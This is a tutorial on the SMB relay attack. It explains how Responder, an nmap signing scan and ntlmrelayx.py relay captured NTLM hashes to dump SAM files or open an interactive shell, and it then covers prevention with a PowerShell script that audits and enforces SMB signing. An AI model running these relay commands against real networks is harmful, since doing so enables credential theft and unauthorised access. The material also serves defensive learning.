SMB relay attack

What is an SMB relay attack

When a user enters the address of a machine that does not exist on the network, their computer sends out a multicast request asking the other computers whether any of them knows that address. Our listener answers that request, claiming to know the address, and the requesting user's authentication hash is then sent to us so we can pass it on for them. The reason this works so frequently is that by default SMB does not perform message signing on workstations, i.e. the target is not checking that the user requesting the share is really who the session claims to be. By default message signing is turned on for servers; on workstations it is either not turned on or is enabled but not required.

This attack only works if we are a local admin on both machines: the machine requesting the file share and the machine that we relay the hash to and log in on.

Configuring Responder

Because we have to relay the hash instead of just capturing it, Responder needs to have both its SMB server and its HTTP server turned off. Edit the Responder config file at /etc/responder/Responder.conf, set SMB and HTTP to Off, and then start Responder with:
sudo responder -I eth0 -rdw -v
Responder should now look like this:

Scan for IP addresses with SMB message signing turned off

nmap comes with a script for checking message signing called smb2-security-mode.nse. Scan the subnet using this script and add the IP addresses that do not require message signing to a target file:
sudo nmap -p 445,139 --script=smb2-security-mode.nse -T4 192.168.1.0/24

Setup the relay script

The tool used for relaying the hash is called ntlmrelayx.py. Run it with your target file and the -smb2support switch:
sudo ntlmrelayx.py -tf targets.txt -smb2support

Capturing the hash, relaying it and dumping the local SAM file

Request a share that does not exist using an admin account. Notice how the script checks whether Remote Registry is enabled, enables it if not, dumps the SAM and then disables it again.
Additionally, gaining a remote shell via this attack is as easy as adding the -i switch to the end of our ntlmrelayx command:
sudo ntlmrelayx.py -tf targets.txt -smb2support -i

Prevention

  • Enable SMB signing on all devices. This can be done via Group Policy.
  • Disable NTLM authentication on the network. Use Kerberos instead.
  • Limit Domain Admins to specific tasks.
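The first two prevention points can be audited and enforced per host from an elevated PowerShell session. The script below is an added example written for these notes, not part of the original page or of any of the tools it mentions. It assumes the SmbShare module (Windows 8 / Server 2012 and later) is available; the Group Policy setting names and registry paths in the comments are the standard Windows ones that the cmdlets write to.

```powershell
# Added example: report whether this host requires SMB signing (client and
# server side) and whether outbound NTLM is restricted; with -Enforce, turn
# signing on. Run as Administrator.
param(
    [switch]$Enforce   # without -Enforce the script only reports
)

# Registry locations behind the two GPO settings
#   "Microsoft network server: Digitally sign communications (always)"
#   "Microsoft network client: Digitally sign communications (always)"
$serverKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$clientKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers"
# 0 = allow all, 1 = audit all, 2 = deny all (value may be absent if never set)
$ntlmKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

function Get-SigningState {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration
    $ntlm   = Get-ItemProperty -Path $ntlmKey -Name RestrictSendingNTLMTraffic -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ServerRequiresSigning     = $server.RequireSecuritySignature
        ClientRequiresSigning     = $client.RequireSecuritySignature
        RestrictSendingNTLMTraffic = if ($ntlm) { $ntlm.RestrictSendingNTLMTraffic } else { 'not set (0)' }
    }
}

$before = Get-SigningState
$before | Format-List

if (-not $before.ServerRequiresSigning) {
    Write-Warning 'Server-side signing not required: this host can be used as a relay target.'
}
if (-not $before.ClientRequiresSigning) {
    Write-Warning 'Client-side signing not required: sessions from this host can be relayed.'
}

if ($Enforce) {
    # Same effect as setting RequireSecuritySignature = 1 under $serverKey / $clientKey;
    # -Force suppresses the confirmation prompt. Use Group Policy for fleet-wide rollout.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    Write-Output 'SMB signing is now required; re-checking:'
    Get-SigningState | Format-List
}
```

Run it without switches first to see the current state, then with -Enforce on a test host before pushing the equivalent Group Policy settings to the domain. Requiring signing on the client side as well as the server side matters here: the server setting stops a host from being a relay target, while the client setting stops its users' sessions from being relayed elsewhere.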